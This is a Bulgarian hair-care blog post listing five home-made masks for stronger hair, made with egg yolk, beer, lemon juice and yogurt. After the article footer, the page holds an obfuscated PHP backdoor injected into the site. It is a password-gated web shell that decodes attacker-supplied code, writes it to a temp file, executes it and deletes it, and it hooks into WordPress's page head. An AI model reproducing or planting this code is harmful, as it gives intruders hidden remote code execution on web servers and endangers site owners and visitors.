5 маски за силна коса | Косопад

5 маски за силна коса

Доброто състояние на косата зависи до голяма степен от здравето ни. Здравословните навици, най- вече свързани с храненето и движението, поддържат цялото ни тяло в отлична кондиция, в това число и косата.

Ако искаме да засилим косата, можем да използваме и допълнителни природни средства.

Предлагаме ви няколко маски за коса, които са перфектни за косъма и скалпа.

Варианти с яйце
Яйцето е много полезно за косата, като свойствата зависят от това коя негова част използваме. Жълтъкът има хидратиращи свойства, богат е на протеини и мазнини. Подходящ е за сух тип коса.

Белтъкът помага да се справим с излишната мазнина и бактериите. Ефектът му е обратен на жълтъка. Препоръчва се при мазна коса.

За нормална коса се използва цялото яйце.

yaitse-1

Вариант 1.
Съставки: 2 жълтъка, 2 лъжици рициново масло
Приготвяне и нанасяне: Смесване жълтъците и рициновото масло. Нанасяме върху повърхността на косата, включително скалпа. Правим масаж с кръгообразни движения със среден натиск. Плакнем със студена вода.

Вариант 2.
Съставки: 1 жълтък, ½ чаша кисело мляко
Приготвяне и нанасяне: Приготвяме маска като смесваме двете съставки. За целта разбъркваме с вилица. Нанасяме върху косата и оставяме да действа 30 минути. След това плакнем със студена вода.

Вариант 3.
Съставки: 1 яйце, ½ чаша бира, 1 лъжица олио
Приготвяне и употреба: Сипваме необходимото количество бира в чаша и чакаме два часа, за да добие стайна температура. След като мине това време, добавяме останалите съставки. Разбъркваме и нанасяме на косата. Не трябва да пропускаме нито един участък. Трябва да престои 15 минути, след което се мие със студена вода.

Маска с лимон
Съставки: 2 лъжици лимонов сок, 2 лъжици зехтин, 2 лъжици вода
Приготвяне и нанасяне: Смесете шестте лъжици в един съд. С латексови ръкавици нанасяме по скалпа. Масажираме поне 5 минути. Добре е тази маска да се прави преди баня.

Маска с кисело мляко
Съставки: ½ чаша кисело мляко
Приготвяне и нанасяне: Разнасяме добре върху косата и оставяме да действа 15 минути. След това плакнем със студена вода. Прави се преди баня.

31. март 2017 10:14:01 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}